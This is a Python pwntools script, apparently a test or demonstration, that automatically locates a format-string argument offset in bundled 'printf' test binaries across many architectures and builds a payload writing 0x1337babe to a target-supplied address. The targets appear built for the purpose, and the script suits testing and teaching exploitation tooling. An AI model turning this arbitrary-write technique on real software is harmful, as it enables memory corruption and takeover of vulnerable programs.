#!/usr/bin/env python
from pwn import *
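@context.quiet
def exec_fmt(payload):
    """Run ``context.binary`` once with *payload* on stdin and return its output.

    ``FmtStr`` calls this repeatedly while it searches for the format-string
    argument offset, so every call spawns a fresh process.  The process is
    opened as a context manager so its pipes are closed as soon as the
    output has been collected, instead of lingering until garbage
    collection across the many probe runs.

    Args:
        payload: bytes sent as one line on the target's stdin.

    Returns:
        Everything the target wrote until it closed its output
        (``recvall`` blocks until EOF, so a target that never exits
        would stall the offset search here).
    """
    with context.binary.process() as p:
        p.sendline(payload)
        return p.recvall()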
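def exploit(binary):
    """Find the format-string offset in *binary* and use it to write to an address.

    Steps, each against a freshly spawned process of *binary*:

    1. ``FmtStr(exec_fmt)`` probes the target through :func:`exec_fmt` to
       discover at which printf argument index our input lands.
    2. The target first emits one pointer (``context.bytes`` wide, decoded
       with the target's endianness) naming the address to overwrite.
    3. ``fmtstr_payload`` builds a format string that writes the 4-byte
       value ``0x1337babe`` there; after the target prints ``DONE`` it
       emits 4 more bytes (presumably read back from that address), which
       are printed as hex.

    Args:
        binary: path to the ELF target.  It is executed, repeatedly, so only
            point this at binaries you intend to run.

    Side effects:
        Sets ``context.binary`` (and with it arch/bits/endianness) for the
        whole interpreter and prints one line to stdout.  ``recvuntil`` and
        ``recvn`` block until the target produces the expected bytes.
    """
    context.binary = ELF(binary)
    autofmt = FmtStr(exec_fmt)
    offset = autofmt.offset

    with context.binary.process() as p:
        # recv(n) returns *up to* n bytes; recvn(n) waits for exactly n,
        # which unpack() needs to decode a full pointer.
        addr = unpack(p.recvn(context.bytes))
        # p32/u32 on purpose: the value written and read back is 4 bytes
        # wide on every target, independent of context.bits.
        payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
        p.sendline(payload)
        p.recvuntil(b"DONE")
        print(hex(u32(p.recvn(4))))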
# Targets are taken from the command line when given; every path listed
# here is executed by exploit(), so only pass binaries you mean to run.
binaries = sys.argv[1:]

# No arguments: fall back to the bundled test program, one build per
# supported architecture.
if not binaries:
    binaries = [
        "printf.mips",
        "printf.mips64",
        "printf.mipsel",
        "printf.mips64el",
        "printf.native",
        "printf.native32",
        "printf.ppc",
        "printf.ppc64",
        "printf.sparc64",
        "printf.arm",
        "printf.aarch64",
    ]

for binary in binaries:
    exploit(binary)